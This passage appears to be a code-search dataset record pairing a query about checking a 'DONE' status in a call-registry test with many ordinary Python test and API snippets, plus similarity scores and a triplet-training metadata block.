'CARD',\n 'entity_name': 'Compound'\n }\n\n request = requests.post(url, data=payload)\n\n status_code = request.status_code\n print(f'status_code: {status_code}')\n response_text = request.text\n utils.print_es_response(response_text)\n assert status_code == 200, 'The request failed!'", "def start_job(self):\n # POST /jobs/{job_id}/results\n pass", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_post_job_log_export(self):\n job_id = 'job_id_example'\n response = self.client.open(\n '/v1/job/logs',\n method='POST',\n data=json.dumps(job_id),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "def test_create_seed_validation(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'validation'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def test_run_started(self):", "def start(self):\n self.server.request(\"post\", \"/jobs/%s/%s/state\" % (self.sessionid,\n self.name), body=\"1\")\n return True", "def test_create_valid_submission(self):\n with self.client:\n # valid submission registration\n sub_response = register_ok_submission(self, self.token)\n response_data = json.loads(sub_response.data.decode())\n self.assertTrue(response_data['status']=='success')", "def test_call_first_time(self, query_repo_url, get_credentials, valid_revision, get):\n self.assertEquals(\n self.query_api._get_all_jobs(\"try\", \"146071751b1e\"),\n json.loads(JOBS_SCHEDULE))\n\n assert get.call_count == 1\n\n # Test that this fills our caches\n self.assertEquals(\n query_jobs.JOBS_CACHE[(\"try\", \"146071751b1e\")],\n json.loads(JOBS_SCHEDULE))", "def test_get_start_form_data(self):\n pass", "def test_task(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n json = self.generate_task_dictionary(tid, state=\"error\")\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, json=json)\n\n task = self.client.site(site).task(tid)\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"error\")", "def startTestHook(self):", "def test_start_already_running(self, mock_add_job, mock_get_job):\n mock_get_job.return_value = MagicMock()\n\n result = self.aggregator.start(self.node_id)\n\n self.assertFalse(result)\n self.assertFalse(mock_add_job.called)", "def test_fax_inbound_automation_post(self):\n pass", "def test_start_mdt(self):\n response = self.client.get(reverse('start-mdt', args=[self.sample_type]), follow=True)\n self.assertContains(response, self.proband.gel_id)\n self.assertEqual(response.status_code, 200)", "async def test_launch_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_LAUNCH_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def setUp(self):\n self.app = webtest.TestApp(main.app) \n self.batch_id = \"R1HIA55JB5DOQZM8R53OKMCWZ5BEQKUJ\"", "def start_workunit(self, workunit):\r\n pass", "def start_workunit(self, workunit):\r\n pass", "def test_successful_on_get(self):\n\n url = '/%s/jobs/' % self.api\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "def test_create_job(self):\n engine = Engine(self.config_file, self.api_token)\n\n engine.create_job()\n\n assert engine.ingest_job_id == 23", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def startTestRun(self):", "def start():\n url = request.form['url']\n tag_task = parse_html_tags.delay(url)\n return jsonify({'taskid': tag_task.id}), 202, {'Location': url_for('task_state', task_id=tag_task.id)}", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "def worker_logstart(self, node, nodeid, location):\n self.config.hook.pytest_runtest_logstart(nodeid=nodeid, location=location)", "def start(coordinator_url: str, use_case: UseCase):\n\n raise NotImplementedError", "def test_ref_id(self):\n template = self._set_template(self.lb_template)\n rsrc, fake_lb = self._mock_loadbalancer(template,\n self.lb_name,\n self.expected_body)\n self.m.ReplayAll()\n scheduler.TaskRunner(rsrc.create)()\n self.m.VerifyAll()\n\n self.assertEqual(rsrc.resource_id, rsrc.FnGetRefId())", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "def startTest(asset):", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def start(jira_url, jira_username, jira_api_key, jira_project_key, toggl_api_key, toggl_workspace_id, toggl_project_id,\n issue_key):\n click.echo(start_task(jira_url, jira_username, jira_api_key, jira_project_key, toggl_api_key, toggl_workspace_id,\n toggl_project_id, issue_key))", "async def job_start(self, uid, args, env, cwd, port_expected_count,\n forward_stdout=False):\n self._require_running()\n if port_expected_count and self._job_start_endpoint is None:\n raise RuntimeError(\n 'cannot run server job: job start endpoint is not set'\n )\n process_env = dict(os.environ)\n # TODO: Make properties case-insensitve, forced uppercase?\n self._extend_with_prefix(\n process_env,\n self._properties,\n self.PREFIX_PROPERTIES\n )\n if port_expected_count:\n self._extend_with_prefix(\n process_env,\n {\n self.PROPERTY_JOB_ENDPOINT: self._job_start_endpoint,\n self.PROPERTY_JOB_ID: str(uid)\n },\n self.PREFIX_PROPERTIES\n )\n process_env.update(env or {})\n\n await self._get_job(uid).start(\n args, process_env, cwd, port_expected_count, forward_stdout\n )\n # TODO: Support job queueing?\n # (and finite amount of job slots on an agent instance)", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def _StartRequest(self, request_id, manager):\n pending_path = self._GetRequestPathname(request_id, self._PENDING)\n with open(pending_path, 'r') as f:\n request_object = pickle.load(f)\n manager.StartTask(request_id, request_object)\n self._TransitionRequest(request_id, self._PENDING, self._RUNNING)", "def test_launch_deployment(self):\n pass", "def test_job_id(self):\n\n url = '/%s/jobs/?job_id=%s' % (self.api, self.job1.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def test_api_authentication(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200)\n new_job.request('get', url, expected_response=200)\n assert httpretty.last_request().headers['X-SFDC-Session'] == 'the-session-id'", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def test_command_trigger_webhook_post(self):\n pass", "def test_batch(self):\n batch = batch_test_utils.create_batch()\n self.job1.batch_id = batch.id\n self.job1.save()\n\n url = '/%s/jobs/?batch_id=%d' % (self.api, batch.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def test_post_task(self):\n resp = self.app.post('/api/2/inf/esrs',\n headers={'X-Auth': self.token},\n json={'name': \"myESRS\", 'image': \"3.28\", 'network': \"someNetwork\"})\n\n task_id = resp.json['content']['task-id']\n expected = 'asdf-asdf-asdf'\n\n self.assertEqual(task_id, expected)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def start_master_worker():\n print(\"Starting master worker\")\n r = req.patch(f\"{MASTER_API_URL}/formation/worker\", json=API_PAYLOAD_1, headers=MASTER_API_HEADERS)\n if r.status_code != req.codes.ok:\n print(\"Unable to start the worker dyno on master\")\n print(r.text)\n return False\n #wait a bit for the worker process to start\n print(\"Waiting a bit\")\n time.sleep(10)\n return True", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def pytest_runtest_logstart(nodeid):\n log.debug(\">>>>>>> START %s >>>>>>>\", nodeid)", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", self.helper_thread.test_test_ports , ( ) )", "def start_flow():\n if request.method == 'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start(self, **kwargs):\n return self.client.api.start(self.id, **kwargs)", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def test_run_prefix__success_with_json(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--metadata-json\",\n '{\"somekey\": \"somevalue\"}',\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Assigning metadata to the uploaded samples.\" in res.output", "def start(self, sessionId, task, contact):\n pass", "def test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def test_successful_configuration(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk,\n \"configuration\" : self.configuration\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def start_build(self, build_id):\n pass", "def Start(sliver_name):\n rec = sliver_name\n account.get(rec['name']).start(rec)\n logger.log(\"api_calls: Start %s\"%rec['name'])", "def test_upload_1_generation_shell(self):\n entry = mock.MagicMock()\n device_os = mock.MagicMock()\n families = {\"first_gen\": mock.MagicMock()}\n device_os.families.get.return_value = families\n vendor = mock.MagicMock(get_device_os=mock.MagicMock(return_value=device_os))\n first_gen = families[\"first_gen\"]\n cs_session = mock.MagicMock()\n resource_name = \"test resource name\"\n self.networking_handler._upload_resource = mock.MagicMock(return_value=resource_name)\n\n # act\n self.networking_handler.upload(entry=entry,\n vendor=vendor,\n cs_session=cs_session)\n # verify\n self.networking_handler._upload_resource.assert_called_once_with(cs_session=cs_session,\n entry=entry,\n resource_family=first_gen[\"family_name\"],\n resource_model=first_gen[\"model_name\"],\n driver_name=first_gen[\"driver_name\"])", "def test_execute_get_success():\n response_queue = run_get(\n TestData.RECEPTOR_CONFIG,\n json.dumps(TestData.JOB_TEMPLATE_PAYLOAD_SINGLE_PAGE),\n TestData.JOB_TEMPLATE_RESPONSE,\n )\n response = response_queue.get()\n validate_get_response(\n response,\n 200,\n TestData.JOB_TEMPLATE_COUNT,\n [TestData.JOB_TEMPLATE_1, TestData.JOB_TEMPLATE_2],\n )", "def test_starts_returned_async(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n returned_async = Mock(spec=Async)\n\n work = Async(target=_fake_async_returning_target,\n args=[returned_async])\n\n with _ExecutionContext(work):\n run_job()\n\n returned_async.start.assert_called_once_with()", "def start_import_task(clientRequestToken=None, name=None, importUrl=None):\n pass", "def test_add_seed_job_type(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'my-new-job'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n good_setting = {\n 'DB_HOST': 'scale'\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n self.assertTrue('/%s/job-types/my-new-job/1.0.0/' % self.api in response['location'])\n\n job_type = JobType.objects.filter(name='my-new-job').first()\n\n results = json.loads(response.content)\n self.assertEqual(results['id'], job_type.id)\n self.assertEqual(results['version'], job_type.version)\n self.assertEqual(results['title'], job_type.get_title())\n self.assertEqual(results['revision_num'], job_type.revision_num)\n self.assertEqual(results['revision_num'], 1)\n self.assertIsNone(results['max_scheduled'])\n self.assertEqual(results['configuration']['settings'], good_setting)", "def startexp(proj,exp,nsfilestr,batch=False):\n response=do_method(\"experiment.startexp\",\n {\"proj\":proj,\"exp\":exp,\"nsfilestr\":nsfilestr,\"batch\":batch})\n \n check_response(response)", "def initialize_test(load_generator_dns, first_web_service_dns):\n\n add_ws_string = 'http://{}/autoscaling?dns={}'.format(\n load_generator_dns, first_web_service_dns\n )\n response = None\n while not response or response.status_code != 200:\n try:\n response = requests.get(add_ws_string, timeout = 10)\n except requests.exceptions.RequestException as e:\n print(e)\n time.sleep(1)\n pass \n\n # TODO: return log File name\n return get_test_id(response)", "def setUp(self):\n response = self.client.post('/trainer/create/',\n {\"name\": \"Blue\",\n \"las_name\": \"Oak\"})\n self.trainer_id = response.json()[\"id\"]", "def test_xqueue_callback_success(self):\r\n fake_key = 'fake key'\r\n xqueue_header = json.dumps({'lms_key': fake_key})\r\n data = {\r\n 'xqueue_header': xqueue_header,\r\n 'xqueue_body': 'hello world',\r\n }\r\n\r\n # Patch getmodule to return our mock module\r\n with patch('courseware.module_render.find_target_student_module') as get_fake_module:\r\n get_fake_module.return_value = self.mock_module\r\n # call xqueue_callback with our mocked information\r\n request = self.request_factory.post(self.callback_url, data)\r\n render.xqueue_callback(request, self.course_key, self.mock_user.id, self.mock_module.id, self.dispatch)\r\n\r\n # Verify that handle ajax is called with the correct data\r\n request.POST['queuekey'] = fake_key\r\n self.mock_module.handle_ajax.assert_called_once_with(self.dispatch, request.POST)", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])" ]
[ "0.7932951", "0.7636372", "0.7201175", "0.70154786", "0.69145167", "0.66262203", "0.626443", "0.62300295", "0.61841965", "0.60890883", "0.5921425", "0.58591396", "0.58441097", "0.57225126", "0.57005316", "0.56909", "0.5625876", "0.55742955", "0.5544029", "0.55416805", "0.5526437", "0.5522578", "0.54462385", "0.54407954", "0.5440683", "0.5436101", "0.5434459", "0.5426045", "0.54162467", "0.54031223", "0.5396291", "0.53804284", "0.53417903", "0.5338947", "0.5308122", "0.5294205", "0.5292848", "0.5290397", "0.52743185", "0.5272739", "0.52577144", "0.5252663", "0.52408576", "0.5236346", "0.5233432", "0.5231192", "0.5231192", "0.52310145", "0.52147037", "0.52112246", "0.5200274", "0.5185495", "0.5178097", "0.5175981", "0.51740754", "0.51714957", "0.5162615", "0.51582557", "0.5151847", "0.51455903", "0.5144827", "0.5130889", "0.511182", "0.51055926", "0.5100169", "0.50863314", "0.5086115", "0.5086055", "0.50832653", "0.50821257", "0.5079833", "0.507019", "0.5067746", "0.50630015", "0.50603193", "0.50596887", "0.5053124", "0.50435483", "0.50432", "0.5036978", "0.50343245", "0.5032904", "0.50283754", "0.50231296", "0.50073147", "0.5004912", "0.4999766", "0.49928647", "0.49873102", "0.49841526", "0.49824846", "0.49813762", "0.49811488", "0.49803066", "0.4978842", "0.49672693", "0.49614018", "0.49521956", "0.49495173", "0.49478623" ]
0.784503
1
Test if there is a 'status' property in a response about registry process, and if it contains a 'DONE' status about this task. Test uses start_call_fx fixture
def test_expect_status_property_about_registry_process(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') job_id = response.data.get('job_id') job = client.get(job_id) assert job.data.get('status') == 'DONE'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_get_status(self):\n pass", "def test_get_status(self):\n pass", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "async def test_health():\n response = health()\n assert response\n assert {'status': 'ok'} == response", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def test_wait(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n first_response = self.generate_task_dictionary(\n tid, state=\"waiting\", completed=False\n )\n\n responses = [\n {\"json\": first_response},\n {\"json\": self.generate_task_dictionary(tid)},\n ]\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, responses)\n\n task = self.client.site(site).task(tid).wait()\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"done\")", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def testTurbiniaWait(self, mock_get_request_status, _):\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_get_request_status\n self.turbinia_processor.requests_api_instance = mock_api_instance\n mock_get_request_status.return_value = self._request_status\n for task, path in self.turbinia_processor.TurbiniaWait(TASK_ID):\n # Check that the task and path are correct for a PlasoParserTask\n if task[\"id\"] == TASK_ID:\n self.assertEqual(task, self._request_status[\"tasks\"][0])\n self.assertEqual(path, TEST_TASK_PATH)\n break", "def test_do_status(get_resource_status: MagicMock, response: execution.ResponseInfo):\n get_resource_status.return_value = response\n bundle = MagicMock()\n bundle.resources.matching.return_value = [MagicMock(), MagicMock()]\n action = interface.CommandAction(MagicMock(), [], bundle)\n interface.do_status(action)\n assert get_resource_status.call_count == 2", "def check_status(self):", "async def get_status():", "def test_completed(self):\n return False", "def task_succeed(json_raw):\n rally_report = json.loads(json_raw)\n tasks = rally_report.get('tasks')\n if tasks:\n for task in tasks:\n if task.get('status') != 'finished' or \\\n task.get('pass_sla') is not True:\n return False\n else:\n return False\n return True", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_check_process_output(self):\n workflow = self.get_workflow(\n 